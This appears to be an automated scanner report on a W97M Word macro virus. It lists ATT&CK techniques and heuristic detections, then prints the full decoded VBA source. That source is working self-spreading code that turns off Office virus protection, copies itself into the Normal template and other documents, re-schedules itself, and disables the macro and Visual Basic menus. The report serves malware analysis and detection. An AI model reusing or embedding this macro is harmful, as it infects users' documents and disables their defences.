Verdict: MALICIOUS
Risk score: 168

Malware Insights
MITRE ATT&CK
- T1059.005 Visual Basic
- T1547.001 Registry Run Keys / Startup Folder
- T1566.001 Spearphishing Attachment
The sample is identified as a W97M variant, a family known for macro-based attacks. The AutoOpen macro attempts to disable macro protection and copy itself to the Normal template, indicating a persistence mechanism. This behavior is consistent with malware designed to spread and execute malicious code within the Office environment.
Heuristics (5)
- ClamAV: Win.Trojan.W97M-13 (critical) [CLAMAV_DETECTION]: ClamAV detected this file as malware: Win.Trojan.W97M-13
- VBA macros detected (medium, 2 related findings) [OLE_VBA_MACROS]: Document contains VBA macro code
- VBA macro-virus self-replication / AV tampering (critical) [OLE_VBA_MACRO_VIRUS_REPLICATION]: VBA macro programmatically rewrites VBA project code through the VBE object model (CodeModule/VBComponents InsertLines/DeleteLines/AddFromString or OrganizerCopy) to copy itself into the global template and other open documents, and/or disables Office macro-virus protection (Options.VirusProtection = False). This is the defining behavior of the W97M document macro-virus family: self-replicating code with no benign document use, independent of any AV signature. Matched line in script: `Options.VirusProtection = False`
- AutoOpen macro (low) [OLE_VBA_AUTOOPEN]: AutoOpen macro. Matched line in script: `Attribute VB_Name = "AutoOpen"`
- Legacy WordBasic auto-exec macro marker (medium) [OLE_LEGACY_WORDBASIC_AUTOEXEC]: OLE Word document contains a legacy WordBasic auto-execution marker such as AutoOpen, but no modern VBA project was recovered and no stronger macro-virus family marker was present. This is analyst-facing evidence for old Word macro execution surface, not a downloader or parser-CVE attribution by itself.
Extracted artifacts (1)
Files carved from inside the sample during analysis.

| Filename | Kind | Source | Size | SHA-256 |
|---|---|---|---|---|
| macros.bas | vba-macro | oletools.olevba.extract_macros (decoded VBA source) | 11052 bytes | 06aefc9e7b5dcc22a8fb067028e7e5cc7c8d04a341f41fee7a8c887735bbd075 |
Preview of the extracted script (first 1,000 lines of macros.bas):

```vb
Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Attribute VB_Name = "AutoOpen"
Option Explicit

Public Sub MAIN()
    Dim MyFile$
    Dim OkExist
    Dim TemplateName$
    Dim internal
    Dim xItem
    Dim t
    Dim s
    ' Set up the error trap
    On Error Resume Next
    ' Get the active document's file name
    If ActiveDocument.Path = "" Then
        MyFile$ = ActiveDocument.Name
    Else
        MyFile$ = ActiveDocument.Path + "\" + ActiveDocument.Name
    End If
    If MyFile$ = "" Then GoTo Bye
    ' Show date/time information on the hour
    t = Format(Time, "hhmmss")
    If Mid(t, 3, 2) = "00" And Not (Format(Date, "yyyy") = "1998" And Val(Format(Date, "mm")) < 9) Then
        MsgBox s, vbSystemModal, "CPSDI"
        ' Disabled reminder message box (captions: "day", "hour", "My reminder")
        'MsgBox Format(Date, "dddd,yyyy mmm dd") + "日 " + Format(Time, "hh") + "时", vbSystemModal, "我的提醒"
    End If
    ' Check whether the global (Normal) template already has an AutoOpen macro
    OkExist = 0
    For Each xItem In NormalTemplate.VBProject.VBComponents
        If xItem.Type = 1 And xItem.Name = "AutoOpen" Then
            OkExist = 1
            Exit For
        End If
    Next xItem
    ' Get the global template's file name
    TemplateName$ = NormalTemplate.Path + "\" + NormalTemplate.Name
    ' Reset the global template's file attributes and disable its virus protection
    SetAttr TemplateName$, vbNormal
    Options.VirusProtection = False
    ' Copy the AutoOpen macro into the global template
    If OkExist <> 1 Then
        Application.OrganizerCopy Source:=MyFile$, Destination:=TemplateName$, Name:="AutoOpen", Object:=wdOrganizerObjectProjectItems
    End If
    ' Check whether the active document already has an AutoOpen macro
    OkExist = 0
    For Each xItem In ActiveDocument.VBProject.VBComponents
        If xItem.Type = 1 And xItem.Name = "AutoOpen" Then
            OkExist = 1
            Exit For
        End If
    Next xItem
    ' Copy the AutoOpen macro into the active document
    If OkExist <> 1 Then
        Application.OrganizerCopy Source:=TemplateName$, Destination:=MyFile$, Name:="AutoOpen", Object:=wdOrganizerObjectProjectItems
    End If
Bye:
    ' Set a timer that re-runs the AutoOpen macro automatically
    internal = "00:" + Str(10 - Val(Mid(t, 4, 1)))
    Application.OnTime When:=Now + TimeValue(internal) - TimeValue("00:00:" + Right(t, 2)), Name:="AutoOpen", Tolerance:=60
    DisableMacroMenu
    DisableVBTools
End Sub

Public Sub DisableMacroMenu()
    ' Disable the Macro command group in the Tools menu
    Dim cb, xItem, xxItem, xxxItem
    For Each cb In ActiveDocument.CommandBars
        If cb.Name = "Menu Bar" Then
            For Each xItem In cb.Controls
                If xItem.Caption = "工具(&T)" Then        ' Tools menu (Chinese-locale caption)
                    For Each xxItem In xItem.Controls
                        If xxItem.Caption = "宏(&M)" Then  ' Macro submenu (Chinese-locale caption)
                            'xxItem.Enabled = True
                            For Each xxxItem In xxItem.Controls
                                xxxItem.Enabled = False
                            Next xxxItem
                            Exit Sub
                        End If
                    Next xxItem
                End If
            Next xItem
        End If
    Next cb
End Sub

Public Sub DisableVBTools()
    ' Disable the Visual Basic toolbar
    Dim cb
    For Each cb In ActiveDocument.CommandBars
        If cb.Name = "Visual Basic" Then
            cb.Enabled = False
            Exit For
        End If
    Next cb
End Sub

' Processing file: /opt/analyzer/scan_staging/20de1762c7234ee2bc1897fc42b88c8a.bin
' ===============================================================================
' Module streams:
' Macros/VBA/ThisDocument - 903 bytes
' Macros/VBA/AutoOpen - 5792 bytes
```